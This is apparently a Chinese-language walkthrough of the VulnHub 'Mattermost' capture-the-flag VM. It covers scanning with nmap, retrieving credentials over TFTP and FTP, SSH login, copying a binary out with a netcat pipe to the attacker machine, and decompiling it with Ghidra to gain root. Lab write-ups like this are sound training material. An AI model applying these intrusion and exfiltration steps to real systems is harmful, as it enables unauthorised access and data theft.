vulnhub之mattermost的实践
vulnhub之mattermost的实践
今天实践的是vulnhub的mattermost镜像,下载地址,
https://download.vulnhub.com/enumbox/Mattermost.7z,
用workstation导入成功,先做地址扫描,
sudo netdiscover -r 192.168.137.0/24,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.137.53,
浏览器访问一下http://192.168.137.53:8065,需要用户名密码登录,
接下来的事情就比较尴尬了,竟然想到可能有udp的tftp服务,
扫描一下,真有,sudo nmap -sU -p 69 192.168.137.53,
登录,下载文件,tftp 192.168.137.53,
get README.md
quit
cat README.md
得到了用户名密码,Admin/ComplexPassword0!,登录8065的界面,
找到一个zoom插件的地方,使能插件后,得到一个url,
访问这个url,http://192.168.137.53/JK94vsNKAns6HBkG/AxRt6LwuA7A6N4gk/index.html,
得到新的用户名密码,ftpuser/ftppassword,登录ftp,
ftp 192.168.137.53
ftpuser
ftppassword
dir
cd users
dir
cd mattermost
dir
get message
bye
cat message
又获取到新的用户名密码,mattermost/Welcome!!!,
这回能ssh登录,登录进去后发现了提示信息,但执行文件说key过期,
ls
cd Desktop
ls
cat README.md
./secret
想办法把secret文件搞出来,kali攻击机上nc -nlvp 1234 > secret,
靶机上,cat secret | nc 192.168.137.141 1234,
kali攻击机上安装反编译软件ghidra,
sudo apt update,sudo apt install ghidra,
cd /usr/share/ghidra,./ghidraRun,
反编译得到key,0xf447,转成10进制,62535,
这回再执行文件,输入正确的key,id一下确认是root,